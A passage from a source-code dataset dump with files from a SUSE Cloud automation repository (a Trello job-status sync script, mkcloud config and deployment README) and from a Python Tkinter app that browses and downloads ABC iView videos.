4608, "license_type": "permissive", "max_line_length": 98, "num_lines": 190, "path": "/scripts/jtsync/jtsync.rb", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env ruby\n#\n# Copyright 2016, SUSE Linux GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nrequire 'trello'\nrequire 'netrc'\nrequire 'optparse'\nrequire 'ostruct'\n\nTRELLO_BOARD = 'ywSqlQpZ'.freeze\n\nmodule Job\n class Mapping\n attr_reader :name\n attr_reader :project\n attr_reader :retcode\n\n STATUS_MAPPING = {\n '0' => 'successful',\n '1' => 'failed'\n }.freeze\n\n def initialize(name, project, retcode)\n @name = name\n @project = project\n @retcode = retcode\n end\n\n def status\n raise \"Unknown returncode '#{retcode}'\" unless STATUS_MAPPING.key? retcode\n STATUS_MAPPING[retcode]\n end\n end\n\n class SuseNormal < Mapping\n def card_name\n name\n end\n\n def list_name\n version = name.split('-')[1]\n \"Cloud #{version[-1, 1]}\"\n end\n end\n\n class SuseMatrix < Mapping\n def version\n project.split(':')[2]\n end\n\n def card_name\n \"C#{version} #{name}\"\n end\n\n def list_name\n \"Cloud #{version}\"\n end\n end\n\n class OpenSuseMatrix < Mapping\n def card_name\n card = name.gsub('openstack-', '')\n \"#{card}: #{project}\"\n end\n\n def list_name\n 'OpenStack'\n end\n end\n\n MAPPING = {\n suse: {\n normal: SuseNormal,\n matrix: SuseMatrix\n },\n opensuse: {\n matrix: OpenSuseMatrix\n }\n }.freeze\n\n def self.for(service, jobtype, name, project, status)\n raise \"No mapping provided for #{service}/#{jobtype}\" unless MAPPING[service].key? jobtype\n MAPPING[service][jobtype].new(name, project, status)\n end\nend\n\ndef credentials_from_netrc\n netrc = Netrc.read\n dev, member = netrc['api.trello.com']\n\n raise 'Could not find credentials!' if dev.nil? || member.nil?\n\n OpenStruct.new(developer_token: dev, member_token: member)\nend\n\ndef parse_job_from_cli\n job = OpenStruct.new\n opts = OptionParser.new do |opt|\n opt.banner = 'Usage: jtsync --ci SERVICE (--matrix|--job) JOB_STATUS'\n opt.on('--ci SERVICE', [:suse, :opensuse], 'Which ci is used (suse or opensuse)') do |service|\n job.service = service\n end\n\n opt.on('--matrix NAME,PROJECT', Array, 'Set status of a matrix job') do |settings|\n job.type = :matrix\n job.project = settings[1]\n job.name = settings[0]\n end\n\n opt.on('--job NAME', 'Set status of a normal job') do |name|\n job.type = :normal\n job.name = name\n end\n end\n opts.order!\n raise 'Either job or matrix is required' if job.type.nil?\n\n Job.for(job.service, job.type, job.name, job.project, ARGV.pop)\nend\n\ndef board\n @trello_board ||= Trello::Board.find(TRELLO_BOARD)\nend\n\ndef notify_card_members(card)\n members = card.members.map do |m|\n '@' + Trello::Member.find(m.id).username\n end\n\n comment = card.add_comment(\"#{members.join(' ')}: card status changed\")\n comment_id = JSON.parse(comment)['id']\n\n card.comments.select do |c|\n c.action_id == comment_id\n end.map(&:delete)\nend\n\ndef update_card_label(card, job)\n label = board.labels.select { |l| l.name == job.status }.first\n raise \"Could not find label '#{job.status}'\" if label.nil?\n\n return if card.labels.include? label\n\n card.labels.each { |l| card.remove_label(l) }\n card.add_label(label)\nend\n\ndef find_card_for(job)\n list = board.lists.select { |l| l.name == job.list_name }.first\n raise \"Could not find list #{job.list_name}\" if list.nil?\n\n card = list.cards.select { |c| c.name == job.card_name }.first\n raise \"Could not find card matching #{job.card_name} in #{job.list_name}\" if card.nil?\n\n card\nend\n\n# run the script --------------------------------------------------------------\nbegin\n credentials = credentials_from_netrc\n job = parse_job_from_cli\n\n Trello.configure do |config|\n config.developer_public_key = credentials.developer_token\n config.member_token = credentials.member_token\n end\n\n card = find_card_for(job)\n update_card_label(card, job)\n notify_card_members(card)\n\nrescue RuntimeError => err\n puts(\"Running jtsync failed: #{err}\")\nrescue Netrc::Error => err\n puts(\"Could not fetch credentials: #{err}\")\nrescue => err\n puts(\"Script failed err was: #{err}\")\nend\n" }, { "alpha_fraction": 0.7670682668685913, "alphanum_fraction": 0.8072289228439331, "avg_line_length": 16.785715103149414, "blob_id": "640ca0fa5bf5f55edf8bc96965e8c806b33c6285", "content_id": "7c31a080fab38b81df53f78457ce8cb2b95c6e42", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 249, "license_type": "permissive", "max_line_length": 30, "num_lines": 14, "path": "/docs/basic-mkcloud-config.sh", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "#!/bin/bash\nunset PARALLEL\nunset cloudpv\nunset cloudsource\nunset nodenumber\nunset want_sles12sp1\n\nexport PARALLEL=yes\nexport cloudpv=/dev/loop0\nexport cloudsource=develcloud6\nexport nodenumber='2'\nexport want_sles12sp1=2\n\nexec /path/to/mkcloud \"$@\"\n" }, { "alpha_fraction": 0.6947368383407593, "alphanum_fraction": 0.6947368383407593, "avg_line_length": 33.54545593261719, "blob_id": "dcb73ed9c5bcdb5b36d0e23578de4559c0354d85", "content_id": "52a5591641625e56d2ec25525daa2be44c111184", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 760, "license_type": "permissive", "max_line_length": 79, "num_lines": 22, "path": "/scripts/lib/libvirt/net-config", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport argparse\n\nimport libvirt_setup\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Create Admin Network Config\")\n parser.add_argument(\"cloud\", help=\"Name of the Cloud\")\n parser.add_argument(\"cloudbr\", help=\"Name of the Virtual bridge\")\n parser.add_argument(\"admingw\", help=\"IP Address of the Admin Gateway\")\n parser.add_argument(\"adminnetmask\", help=\"Netmask of the Admin Network\")\n parser.add_argument(\"cloudfqdn\", help=\"Name of the Cloud-FQDN\")\n parser.add_argument(\"adminip\", help=\"IP Address of the Admin Node\")\n parser.add_argument(\"forwardmode\", help=\"Forward Mode (e.g. nat)\")\n args = parser.parse_args()\n\n print(libvirt_setup.net_config(args))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6998822093009949, "alphanum_fraction": 0.7118963599205017, "avg_line_length": 30.44444465637207, "blob_id": "005a3c337a0f05093af3792ae7fca623524eba6c", "content_id": "c4fa2ee654ee9ce4be64729f2aa53a946335ef0e", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4245, "license_type": "permissive", "max_line_length": 145, "num_lines": 135, "path": "/mkcloudruns/README.md", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "MkCloud Runs\n------------\n\n# Description\n\nRun multiple copies of various scenarios of SUSE OpenStack Cloud product\nusing mkcloud ([automation repository](https://github.com/SUSE-Cloud/automation)).\n\nThis repository is basically a wrapper which automates the boilerplate required\nto start mkcloud with the right configuration settings. Even for non-beginners\nthis boilerplate wrapper script should be really handy due to the overwhelming\namount of configuration options and environment variables used by mkcloud :|.\n\n- Inspiration:\n > I'm just too lazy.\n- The perfect world:\n > We do not need these scripts!\n\n# Deploying SUSE CLoud\n\nFollow these steps to deploy the required SUSE Cloud setup.\n\n## Initial Setup\n\n* Clone the repository\n* Setup up libvirt, KVM,LVM as per the automation repo, follow [this link](https://github.com/dguitarbite/automation/blob/master/docs/mkcloud.md)\n* Create a LVM drive either using dd or give it one partition from your disk\ndrive.\n* Create PV and VG give the VG name in the config file.\n\n### Libvirt\n\n* Check if `libvirtd` is running and if it isn't start it.\n\n ```\n $ sudo systemctl status libvirtd.service # to check the status\n $ sudo systemctl start libvirtd.service # to start the daemon\n ```\n\n It's recommended to configure libvirtd to start on boot.\n ```\n $ sudo systemctl enable libvirtd.service\n ```\n\n* Turn off the firewall, otherwise there are going to be conflicts with the\n rules added by `libvirt`.\n\n ```\n $ sudo service SuSEfirewall2 stop\n ```\n\n Disable the firewall service to prevent it from starting on boot.\n\n * Using systemd:\n ```\n $ sudo systemctl disable SuSEfirewall2\n ```\n * Using SysV:\n ```\n $ sudo service SuSEfirewall2 off\n ```\n\n### Setup storage for mkcloud.\n\n#### Using file as a disk.\n\n*Note:* Skip this step if you have a dedicated partition or disk for LVM.\n\nTo use mkcloud the following additional steps are needed:\n\n* Create a disk file where the virtual machines are going to be stored. The\n minimum recommended is 80 GB.\n\n ```\n $ fallocate -l 80G mkcloud.disk\n ```\n\n* Attach the created disk file to a loop device\n\n ```\n $ sudo losetup -f mkcloud.disk\n ```\n\n* Check the location of the loop device. Something like `/dev/loop0`.\n ```\n $ sudo losetup\n ```\n\n* Set the `cloudpv` variable in (mkcloudrun)[mkcloudrun] script for using this disk.\n - Ex: export cloudpv=/dev/loop0\n - Replace /dev/loop0 with your LVM partition if you want to use a dedicated PV.\n\n\n##Deploy SUSE Cloud\n\n* Configure storage options in the (mkcloudrun)[mkcloudrun] script. Read the comments under LVM.\n* Go to the required folder and run the script `*.mkcloud*`.\n* Ex.:\n ```\n $ cd mkcloudconfig/\n $ cp template user.cloud<ver>\n $ ...\n $ cd ..; sudo ./install_suse_cloud\n ```\n* Scripts are invoked in a screen sessions. The name of the screen session is taken from the name of your configuration file.\n* To monitor the given cloud deployment process join the screen session:\n ```\n $ screen -ls\n $ screen -x <screen_name>\n ```\n To move around in the screen session use the command `<C-R>-a, <tab number>`.\n **Note:** The screen session are mostly invoked as root user, try to use ``sudo screen`` or access as a root user.\n* Monitor the VMs via. virt-manager or virsh. Virt-manager should give you a GUI and easier to use for new users.\n* After the deployment access the dashboards:\n - Crowbar/Admin Dashboard:\n + URL: `http://192.168.52.10:3000` *For DevelCloud5.mkcloud1 only*\n + User: `crowbar` Pass: `crowbar`\n - OpenStack Dashboard:\n + URL: `http://192.168.52.81` *For DevelCloud5.mkcloud1 only*\n + Admin User: `admin` Pass: `crowbar`\n + OpenStack User: `crowbar` Pass: `crowbar`\n\n##Parallel Mkclouds\n\n* To find out the required IP addresses of the mkcloud steup, go through the\n mkcloudrun file in this folder. Usually the formual is good to guess the\nrequired IP addresses.\n* Crowbar admin IP is at xxx.10.\n* Ex: For `cloud number 5` the ip for admin node is 192.168.60.10\n\n##RoadMap\n\n* Add basic CLI to `install_suse_cloud`.\n* Modify the scripts based on others feedback and requirements.\n* Fix automation repository the right way so we do not need these scripts in the first place.\n" } ]
5
yashas123/VTU-15CSL76
https://github.com/yashas123/VTU-15CSL76
9c06c0d6a041450da95b0ecb0074db23d55269d9
c1dacbe1457844fea8acd4ebd87a1d3eb6d8f896
a039dc2e4eced98dd853d0d371b24ea6fed5094c
refs/heads/master
2020-09-16T02:40:10.306933
2019-11-23T17:09:32
2019-11-23T17:09:32
223,623,916
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7272727489471436, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 21, "blob_id": "31a076165521aefeb14da481d3c5e5facf902d56", "content_id": "e5591c9509b94625cb67d5e4f2a728b46816b6ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 29, "num_lines": 2, "path": "/README.md", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "# VTU-15CSL76\nMachine Learning Lab Programs\n" }, { "alpha_fraction": 0.6896359920501709, "alphanum_fraction": 0.6982495188713074, "avg_line_length": 32.644859313964844, "blob_id": "79adf9d71c275c8e14a9e8abd3ff3e38b245810a", "content_id": "8272a74320616febf92b6a873d97f3db865f7ffe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3599, "license_type": "no_license", "max_line_length": 83, "num_lines": 107, "path": "/Program5/p5.py", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "print(\"\\nNaive Bayes Classifier for concept learning problem\")\nimport csv\nimport random\nimport math\nimport operator\ndef safe_div(x,y):\n if y == 0:\n return 0\n return x/y\ndef loadCsv(filename):\n lines=csv.reader(open(filename))\n dataset=list(lines)\n for i in range(len(dataset)):\n dataset[i]=[float(x)for x in dataset[i]]\n return dataset\ndef splitDataset(dataset,splitRatio):\n trainSize =int(len(dataset)*splitRatio)\n trainSet=[]\n copy =list(dataset)\n i=0\n while len(trainSet)<trainSize:\n trainSet.append(copy.pop(i))\n return[trainSet,copy]\ndef separateByClass(dataset):\n separated={}\n for i in range(len(dataset)):\n vector=dataset[i]\n if(vector[-1]not in separated):\n separated[vector[-1]]=[]\n separated[vector[-1]].append(vector)\n return separated\ndef mean(numbers):\n return safe_div(sum(numbers),float(len(numbers)))\ndef stdev(numbers):\n avg=mean(numbers)\n variance = safe_div(sum([pow(x-avg,2) for x in numbers]),float(len(numbers)-1))\n return math.sqrt(variance)\ndef summarize(dataset):\n summaries = [(mean(attribute), stdev(attribute)) for attribute in zip(*dataset)]\n print(summaries)\n del summaries[-1]\n return summaries\ndef summarizeByClass(dataset):\n separated = separateByClass(dataset)\n summaries = {}\n for classValue, instances in separated.items(): \n summaries[classValue] = summarize(instances)\n return summaries\ndef calculateProbability(x, mean, stdev):\n exponent = math.exp(-safe_div(math.pow(x-mean,2),(2*math.pow(stdev,2))))\n final = safe_div(1,(math.sqrt(2*math.pi) * stdev)) * exponent\n return final\ndef calculateClassProbabilities(summaries, inputVector):\n probabilities = {}\n for classValue, classSummaries in summaries.items():\n probabilities[classValue] = 1\n for i in range(len(classSummaries)):\n mean, stdev = classSummaries[i]\n x = inputVector[i]\n probabilities[classValue] *= calculateProbability(x,mean,stdev)\n return probabilities\ndef predict(summaries, inputVector):\n probabilities = calculateClassProbabilities(summaries, inputVector)\n bestLabel, bestProb = None,-1\n for classValue, probability in probabilities.items():\n if bestLabel is None or probability > bestProb:\n bestProb = probability\n bestLabel = classValue\n return bestLabel\ndef getPredictions(summaries, testSet):\n predictions = []\n for i in range(len(testSet)):\n result = predict(summaries, testSet[i])\n predictions.append(result)\n return predictions\ndef getAccuracy(testSet, predictions):\n correct = 0\n for i in range(len(testSet)):\n if testSet[i][-1] == predictions[i]:\n correct += 1\n accuracy = safe_div(correct,float(len(testSet))) * 100.0\n return accuracy\ndef main():\n filename = 'pima-indians-diabetes.data.csv'\n splitRatio = 0.75\n dataset = loadCsv(filename)\n trainingSet, testSet = splitDataset(dataset, splitRatio)\n print('Split {0} rows into'.format(len(dataset)))\n print('Number of Training data: ' + (repr(len(trainingSet))))\n print('Number of Test Data: ' + (repr(len(testSet))))\n print(\"\\nThe Training set are:\")\n for x in trainingSet:\n print(x)\n print(\"\\nThe Test data set are:\")\n for x in testSet:\n print(x)\n summaries = summarizeByClass(trainingSet)\n predictions = getPredictions(summaries, testSet)\n actual = []\n for i in range(len(testSet)):\n vector = testSet[i]\n actual.append(vector[-1])\n print('Actual values: {0}%'.format(actual))\n print('Predictions: {0}%'.format(predictions))\n accuracy = getAccuracy(testSet, predictions)\n print('Accuracy: {0}%'.format(accuracy))\nmain()" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.756373941898346, "avg_line_length": 38.19444274902344, "blob_id": "1afd228894b15d24c5939ae579ab3736c076d739", "content_id": "2cd5d5699beef553d665135330aa6697675ee058", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 106, "num_lines": 36, "path": "/Program9/p9.py", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "# Write a program to implement k-Nearest Neighbour algorithm to classify the iris\n# data set. Print both correct and wrong predictions. Java/Python ML library\n# classes can be used for this problem. \n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as plt\n\n### Step 2 : Load the inbuilt data or the csv/excel file into pandas dataframe and clean the data # ln[66]\n\nfrom sklearn.datasets import load_iris\n\ndata = load_iris()\ndf = pd.DataFrame(data.data, columns=data.feature_names)\ndf['Class'] = data.target_names[data.target]\ndf.head()\nx = df.iloc[:,:-1].values\ny = df.Class.values\n\nprint(x[:5])\nprint(y[:5])\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\nfrom sklearn.neighbors import KNeighborsClassifier\nknn_classifier = KNeighborsClassifier(n_neighbors = 5)\nknn_classifier.fit(x_train, y_train)\nprediction = knn_classifier.predict(x_test)\nprint(prediction)\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nprint(\"Training accuracy Score is : \\n\", accuracy_score(y_train, knn_classifier.predict(x_train)))\nprint(\"Testing accuracy Score is : \\n\", accuracy_score(y_test, knn_classifier.predict(x_test)))\n\nprint(\"Training Confusion Matrix is : \\n\", confusion_matrix(y_train, knn_classifier.predict(x_train)))\nprint(\"Testing Confusion Matrix is : \\n\", confusion_matrix(y_test, knn_classifier.predict(x_test)))\n\n" }, { "alpha_fraction": 0.5916473269462585, "alphanum_fraction": 0.5988656878471375, "avg_line_length": 25.90277862548828, "blob_id": "cf40965bfb14117f77060981e6ec29fcb43bf24a", "content_id": "b7a39afadc6cdc5d1e487b1dd3506d23bd877db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3879, "license_type": "no_license", "max_line_length": 72, "num_lines": 144, "path": "/Program3/id3.py", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "import csv\nimport math\n\n\ndef majorClass(attributes,data,target):\n freq={}\n index=attributes.index(target)\n for tuple in data:\n if tuple[index] in freq:\n freq[tuple[index]]+=1\n else:\n freq[tuple[index]]=1\n max=0\n major=\"\"\t\n for key in freq.keys():\n if freq[key]>max:\n max=freq[key]\n major=key\n\t\t\n return major\n\t\ndef entropy(attributes,data,targetAttr):\n freq={}\n dataEntropy=0.0\n i=0\n for entry in attributes:\n if(targetAttr==entry):\n break\n i=i+1\n i=i-1\n for entry in data:\n if entry[i] in freq:\n freq[entry[i]]+=1.0\n else:\n freq[entry[i]]=1.0\n for freq in freq.values():\n dataEntropy+=(-freq/len(data))*math.log(freq/len(data),2)\n return dataEntropy\n\t\n\ndef info_gain(attributes,data,attr,targetAttr):\n freq={}\n subsetEntropy=0.0\n i=attributes.index(attr)\n for entry in data:\n if entry[i] in freq:\n freq[entry[i]]+=1.0\n else:\n freq[entry[i]]=1.0\n for val in freq.keys():\n valProb=freq[val]/sum(freq.values())\n dataSubset=[entry for entry in data if entry[i]==val]\n subsetEntropy+=valProb*entropy(attributes,dataSubset,targetAttr)\n return (entropy(attributes,data,targetAttr)-subsetEntropy)\n\t \ndef attr_choose(data,attributes,target):\n best=attributes[0]\n maxGain=0;\n for attr in attributes:\n newGain=info_gain(attributes,data,attr,target)\n if newGain>maxGain:\n maxGain=newGain\n best=attr\n return best\n\t\ndef get_values(data,attributes,attr):\n index=attributes.index(attr)\n values=[]\n for entry in data:\n if entry[index] not in values:\n values.append(entry[index])\n return values\n\t\ndef get_data(data,attributes,best,val):\n\tnew_data=[[]]\n\tindex=attributes.index(best)\n\tfor entry in data:\n\t\tif(entry[index]==val):\n\t\t\tnewEntry=[]\n\t\t\tfor i in range(0,len(entry)):\n\t\t\t\tif(i!=index):\n\t\t\t\t\tnewEntry.append(entry[i])\n\t\t\tnew_data.append(newEntry)\n\tnew_data.remove([])\n\treturn new_data\n\t\ndef build_tree(data,attributes,target):\n\tdata=data[:]\n\tvals=[record[attributes.index(target)] for record in data]\n\tdefault=majorClass(attributes,data,target)\n\tif not data or (len(attributes)-1)<=0:\n\t\treturn default\n\telif vals.count(vals[0])==len(vals):\n\t\treturn vals[0]\n\telse:\n\t\tbest=attr_choose(data,attributes,target)\n\t\ttree={best:{}}\n\t\tfor val in get_values(data,attributes,best):\n\t\t\tnew_data=get_data(data,attributes,best,val)\n\t\t\tnewAttr=attributes[:]\n\t\t\tnewAttr.remove(best)\n\t\t\tsubtree=build_tree(new_data,newAttr,target)\n\t\t\ttree[best][val]=subtree\n\treturn tree\n\t\ndef execute_decision_tree():\n data=[]\n with open(\"weather.csv\") as tsv:\n for line in csv.reader(tsv):\n data.append(tuple(line))\n print(\"Number of records:\",len(data))\n\t\t\n attributes=['outlook','temperature','humidity','wind','play']\n target=attributes[-1]\n\t\n acc=[]\n training_set=[x for i,x in enumerate(data)]\n tree=build_tree(training_set,attributes,target)\n print(tree)\n\t\n results=[]\n test_set=[('rainy','mild','high','strong')]\n for entry in test_set:\n tempDict=tree.copy()\n result=\"\"\n while(isinstance(tempDict,dict)):\n child=[]\n nodeVal=next(iter(tempDict))\n child=tempDict[next(iter(tempDict))].keys()\n tempDict=tempDict[next(iter(tempDict))]\n index=attributes.index(nodeVal)\n value=entry[index]\n if (value in tempDict.keys()):\n result=tempDict[value]\n tempDict=tempDict[value]\n else:\n result=\"Null\"\n break\n if result!=\"Null\":\n results.append(result==entry[-1])\n print(result)\n \nif __name__==\"__main__\":\n execute_decision_tree()\n\t\t\t\n\n" }, { "alpha_fraction": 0.7552447319030762, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 26.645160675048828, "blob_id": "19d0a47d72d64f7d21f77ebba0958c1141aad5c1", "content_id": "800746863c2d437823055a8e08067f9a442bfe29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 71, "num_lines": 31, "path": "/Program6/Standard_P6.py", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom sklearn import metrics\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\nc1,c2,c3,c4 = np.loadtxt('data.csv',unpack=True,delimiter = ',')\nx= np.column_stack((c1,c3))\ny= c4\n#Create NaiveBayes Classifier\nclf = GaussianNB()\n#fit the mode\nclf.fit(x,y)\n#make predictions\npredictions = clf.predict(x)\n\nprint('accuracy metrics')\n\n#calculate accuracy\nprint('accuracy of classifer is',metrics.accuracy_score(y,predictions))\nprint('confusion matrix')\nprint(confusion_matrix(y,predictions))\nprint('recall and precision')\nprint(metrics.recall_score(y,predictions))\nprint(metrics.precision_score(y,predictions))\nfrom matplotlib import pyplot as plt\n\nplt.scatter(c1, c3, c=c4)\nplt.colorbar(ticks=[1, 2])\nplt.xlabel(\"Age of the patient\")\nplt.ylabel(\"No of positive axillary nodes\")\nplt.show()\n\n" } ]
5
mohankumargupta/iviewultimate
https://github.com/mohankumargupta/iviewultimate
b4326c2b010fd6a3bbb6cffb2d870c4879b9dc27
7e0f4d2ca2c9a59d4b8bac34b21196baeaf39594
033106fe0e7273dfd41c385cacfb5399142669dc
refs/heads/master
2020-12-24T16:33:06.955916
2016-04-08T23:13:44
2016-04-08T23:13:44
34,769,340
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6522781848907471, "alphanum_fraction": 0.6594724059104919, "avg_line_length": 24.8125, "blob_id": "aecbfd337f81ab7ad6e1cc8f055b098efecbdd46", "content_id": "f25cc967945f432d573fdde77ce318b5c454f267", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 417, "license_type": "no_license", "max_line_length": 83, "num_lines": 16, "path": "/parser.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport requests\n\nclass IViewParser:\n\tdef __init__(self, url):\n\t\tr = requests.get(url)\n\t\tself.soup = BeautifulSoup(r.text);\n\n\tdef findAll(self, tag):\n\t\treturn self.soup.find_all(tag) \n\nif __name__ == '__main__':\n parser = IViewParser('https://tviview.abc.net.au/iview/feed/sony/?keyword=0-Z')\n allvideos = parser.findAll('asset')\n for i in range(2):\n \tprint(allvideos[i])\n \n" }, { "alpha_fraction": 0.7098039388656616, "alphanum_fraction": 0.7202614545822144, "avg_line_length": 30.875, "blob_id": "f1ef488914db4dee4a35f997e52e2e1d7cb3059c", "content_id": "96c13f59054a43d6d11f0f74925c67112de4bff0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 118, "num_lines": 48, "path": "/listing.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "import json\nimport requests\nimport tkinter as Tkinter\nfrom series import SeriesView\nimport iviewdownloader\n\nclass Listing:\n\tdef __init__(self, url):\n\t\tr = requests.get(url)\n\t\tself.listing = json.loads(r.text);\n\tdef getListing(self):\n\t\treturn self.listing\n\n\nclass ListingView:\n\tdef __init__(self, root, url):\n\t\tself.master = root\n\t\tself.frame = Tkinter.Frame(root)\n\t\troot.geometry(\"{}x{}\".format(800,600))\n\t\tscrollbar = Tkinter.Scrollbar(self.frame, orient=\"vertical\")\n\t\tlistbox = Tkinter.Listbox(self.frame, width=800, height=600,selectmode=Tkinter.SINGLE, yscrollcommand=scrollbar.set)\n\t\tlistbox.bind('<Double-Button-1>',self.callback )\n\t\tscrollbar.config(command=listbox.yview)\n\t\tlisting = Listing(url).getListing()\n\t\tself.listing = listing\n\t\tfor item in listing:\n\t\t\tlistbox.insert(Tkinter.END, item['b'])\n\t\tscrollbar.pack(side=\"right\", fill=\"y\")\n\t\tlistbox.pack(side=\"left\",fill=\"both\", expand=True)\n\t\tself.frame.pack()\n\t\tdownloader = iviewdownloader.IViewDownloader()\n\t\tdownloader.download()\n\n\tdef callback(self,event):\n\t\titemnumber = event.widget.curselection()[0]\n\t\titemvalue = event.widget.get(itemnumber)\n\t\tself.newWindow = Tkinter.Toplevel(self.master)\n\t\t#print(self.listing[itemnumber]['a'])\n\t\tnewurl = 'http://iview.abc.net.au/api/legacy/flash/?series={}'.format(self.listing[itemnumber]['a'])\n\t\t#print(newurl)\n\t\tSeriesView(self.newWindow, newurl)\n\t\t#print(itemvalue)\n\nif __name__ == '__main__':\n\tlisting = Listing()\n\tprint(len(listing.getListing()))\n\tprint(listing.getListing()[0])\n\tprint(listing.getListing()[0]['b'])\n" }, { "alpha_fraction": 0.625523030757904, "alphanum_fraction": 0.6380752921104431, "avg_line_length": 26.576923370361328, "blob_id": "9ae5358b328c7f9b2d2154735795da5557d2abc4", "content_id": "32e34348f618106bc0494bfdadb7a4fff26a96bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1434, "license_type": "no_license", "max_line_length": 78, "num_lines": 52, "path": "/iviewdownloader.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "import requests\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nimport threading\nimport urllib3\nimport math\n\ndef run_in_thread(fn):\n def run(*k, **kw):\n t = threading.Thread(target=fn, args=k, kwargs=kw)\n t.start()\n return run\n\n@run_in_thread\ndef downloadIViewVideo(assetid, downloadurl):\n while not IViewDownloader.soup :\n print(\"sleeping for 10 seconds\")\n sleep(10)\n\n assets = IViewDownloader.soup.find_all('asset')\n\n for asset in assets:\n if (asset.find('id').contents[0] == assetid):\n url = asset.find('asseturl').contents[0]\n break\n\n request = urllib3.PoolManager().urlopen('GET', url, preload_content=False)\n with open(downloadurl,'wb') as out:\n filesize = request.getheaders()['content-length']\n blocksize = int(math.ceil(int(filesize)/100.))\n\n for progress in range(100):\n print(\"{}%\".format(progress))\n out.write(request.read(blocksize))\n\n print(\"100%\")\n request.release_conn()\n\nclass IViewDownloader:\n IVIEWFEED = 'https://tviview.abc.net.au/iview/feed/sony/'\n isDownloaded = False\n soup = None;\n\n def __init__(self):\n pass\n\n @run_in_thread\n def download(self):\n r = requests.get(IViewDownloader.IVIEWFEED, verify=False);\n IViewDownloader.soup = BeautifulSoup(r.text)\n IViewDownloader.isDownloaded = True;\n print('It has been downloaded')\n" }, { "alpha_fraction": 0.7764706015586853, "alphanum_fraction": 0.7764706015586853, "avg_line_length": 27.33333396911621, "blob_id": "d3a96b48ec658447de488bce48d64c3cfa60443d", "content_id": "91e57610cd4740c391a4b46f210dd117635ef8a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 74, "num_lines": 6, "path": "/iviewultimate.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "import tkinter as Tkinter\nfrom listing import ListingView\n\nroot = Tkinter.Tk()\nListingView(root, 'http://iview.abc.net.au/api/legacy/flash/?seriesIndex')\nroot.mainloop()\n" }, { "alpha_fraction": 0.6859986186027527, "alphanum_fraction": 0.7017844915390015, "avg_line_length": 31.0219783782959, "blob_id": "991c21b550922b109047129b5d65539b76bcac4d", "content_id": "5351bbda914a3139e3cfb4fbc898889065f3668d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2914, "license_type": "no_license", "max_line_length": 118, "num_lines": 91, "path": "/series.py", "repo_name": "mohankumargupta/iviewultimate", "src_encoding": "UTF-8", "text": "import json\nimport requests\nimport tkinter as Tkinter\nfrom bs4 import BeautifulSoup\nimport urllib3\nimport math\nimport iviewdownloader\nfrom tkinter import filedialog\n\nclass SeriesListing:\n\tdef __init__(self, url):\n\t\tr = requests.get(url)\n\t\tself.url = url\n\t\tself.listing = json.loads(r.text)\n\tdef getListing(self):\n\t\tseriesid = self.url.split(\"series=\")[1]\n\t\titemindex = 0\n\t\tfor item in self.listing:\n\t\t\tif (item['a'] == seriesid):\n\t\t\t\treturn item['f']\n\t\t\titemindex = itemindex + 1\n\t\treturn 